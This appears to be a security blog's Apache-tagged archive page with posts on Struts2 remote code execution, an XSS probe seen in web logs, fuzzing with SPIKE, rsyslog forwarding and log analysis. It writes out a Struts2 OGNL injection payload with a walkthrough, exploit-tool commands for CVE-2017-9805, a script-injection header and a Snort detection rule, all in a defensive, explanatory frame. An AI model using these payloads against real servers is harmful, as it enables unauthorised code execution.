Showing posts with label Apache. Show all posts
Showing posts with label Apache. Show all posts

Sunday, December 23, 2018

CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE

I found this github page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE


https://github.com/mazen160/struts-pwn_CVE-2017-9805

Check if the vulnerability exists against a single URL.

python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'

Exploit a single URL.

python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
Posted by at 1 comment:
Labels: , , ,

Tuesday, August 9, 2016

Expect: alert(document.domain)

GET / HTTP/1.1
Expect: <script>alert(document.domain)</script>

Saw this request in some web logs, what is it? Appears to be a super old XSS (cross site scripting) vulnerability on Apache based web servers from like back in 2006. The attacker is thus looking to see if he can find super old servers that were never patched. The javascript alert method will create a popup box in the browser, and the document.domain variable will print out the current domain (beginning part of the url) that the page is on if vulnerable.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at 1 comment:
Labels: , ,

Tuesday, June 7, 2016

Forward Apache Logs to rsyslog

If you have a central logging system and you already forward syslogs from your linux server to it, the commands are pretty easy to also auto-forward your Apache access logs (your web traffic).

First, open the configuration file with your favorite text editor (my choice was nano)

nano /etc/rsyslog.conf

In the file, at the top add the import module command to allow file monitoring

$ModLoad imfile

Then near the bottom of the file, but before your remote syslog @ command, add the following lines that will allow you to monitor the file

$InputFilePollInterval 10
$InputFileName /var/log/apache2/access.log
$InputFileTag apache-access:
$InputFileStateFile stat-apache-access
$InputFileSeverity info
$InputFilePersistStateInterval 20000
$InputRunFileMonitor

Then restart the syslog service for the changes to take effect

service rsyslog restart

Then validate syslogging is actually sending by running tcpdump and capturing traffic going outbound to that ip

tcpdump -i eth0 host XX.XX.XX.XX
listening on eth0
13:41:57.322554 IP YY.YY.YY.YY.57529 > XX.XX.XX.XX.514: SYSLOG authpriv.notice, length: 101
13:41:57.322909 IP YY.YY.YY.YY.57529 > XX.XX.XX.XX.514: SYSLOG authpriv.info, length: 104
13:41:57.323224 IP YY.YY.YY.YY.57529 > XX.XX.XX.XX.514: SYSLOG authpriv.info, length: 89

You can also verify apache access logs are enabled and working by viewing the log file that should have your logs at the bottom of them

nano /var/log/apache2/access.log

Hope that helps make your apache logging needs simpler.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , , ,

Tuesday, September 1, 2015

Website Fuzzing 101

You have a web application. You want to see if there are any buffer overflows, DoS, or other oddities or you're just interested in determining how good your developers are validating input. One possible way is SPIKE run out of a linux environment.

A spike script tells SPIKE what requests to send. In the example below I'm crafting an http request to send to a test web server, except that the query value will be fuzzed with a bunch of random data.
Example:
s_string("GET /?q=");
s_string_variable("QUERYVALUE");
s-string(" HTTP/1.1\r\n");

Kick off SPIKE...
./generic_send_tcp TESTSERVER 80 ~/scriptfile.spk 0 0
And watch the requests fly out! Then take a look at your application logs and anytime the website crashed or generated scarey buffer overflow, null reference, database, or other errors. ... make sure to review that part of the code and patch your code so that it handles the fuzz data in a more proper manner. Your website should be able to gracefully handle any data thrown at it.
Might be good to tail the apache access logs...
tail -f /var/log/apache2/access.log


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , ,

Friday, June 5, 2015

Analyze Apache Access Logs for Malicious Activity

Let's say I have an Apache Web Server access log. I think something fishy was going on yesterday, but I don't want to manually parse through all the disgusting text based logs to find the craziness. I could write a custom python script, splash in some amazing regular expressions, and try to find the bad stuff on my own. Or I could just use somebody else's :-)

Here in lies a tool like apache scalp. It's a free python script you can download and execute. The only pre-requisites are that you have python installed and that you download the default filter xml file.

Then run the script
  python.exe scalp-0.4.py -l www.mysite_log -o myoutputfolder --html -f default_filter.xml
  Loading XML file 'default_filter.xml'...
  Processing the file 'www.mysite_log'...
  Scalp results:
         Processed 873 lines over 873
         Found 6 attack patterns in 0.581000 s
  Generating output in myoutputfolder\www.mysite_log_scalp_*

It generates a pretty html file that you can open in your browser from the myoutputfolder location. Hopefully if anything you just saved yourself a bunch of time.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: ,

Thursday, March 26, 2015

Apache Struts2 Remote Code Execution Walkthrough

I recently posted notes on an Apache Struts2 Remote Code Execution attempt

Here's the guts of the attack.
GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()} But what is it doing? Let's walk through it in a bit more detail.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.

Back in 2013 Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

In this example we see the vulnerable 'redirect' method being used.

GET /How.do?redirect:

Request to Java Servlet on Apache Tomcat server that is hopefully running an old version that is vulnerable to the redirect method code execution issue

${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),

Get this web request's Response so the attacker can tweak the settings on it

#res.setCharacterEncoding("UTF-8"),

Change the response to a character set that is readable like UTF-8

#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

Get this web request so the attacker can change was it does

#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}


Change this request so that instead of redirecting, it prints the absolute path on disk where the apache tomcat server is hosting the web files

Summary: This attack is not actually doing anything except validating if they've found a vulnerable victim server. Odds are that this is an automated bot scanning the internet for victims, and if the bot gets a response back (like an absolute path on disk where tomcat is running) then the bot will immediately send another more malicious attack that drops a persistent payload on to compromise the server.

Keep your software versions up-to-date.

FYI - This is the snort rule that captures this attempt
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at 1 comment:
Labels: , , ,
Subscribe to: Posts (Atom)